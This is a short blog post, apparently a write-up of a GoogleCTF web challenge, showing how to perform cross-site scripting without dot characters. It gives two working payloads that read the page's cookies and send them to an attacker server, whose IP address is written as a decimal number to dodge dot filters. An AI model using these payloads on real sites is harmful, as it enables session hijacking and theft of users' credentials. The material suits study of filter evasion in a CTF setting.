XSS without Dots, Periods or Full Stops

XSS without Dots, Periods or Full Stops

I had to use it for GoogleCTF’s Wallaby Web 3 Challenge.

My solution:

<img src=x onerror=window['location']="http:///3221226219/?q="+document['cookie']>

Where 3221226219 is the decimal representation of the IP address of the server we used.

Inside <script> tags one can use this['window']['location'] and this['document']['cookie']

Kris’s solution was to use

<script>this['window']['location']='http://3221226219/?q='+this['document']['cookie']</script>

Leave a Reply

Your email address will not be published. Required fields are marked *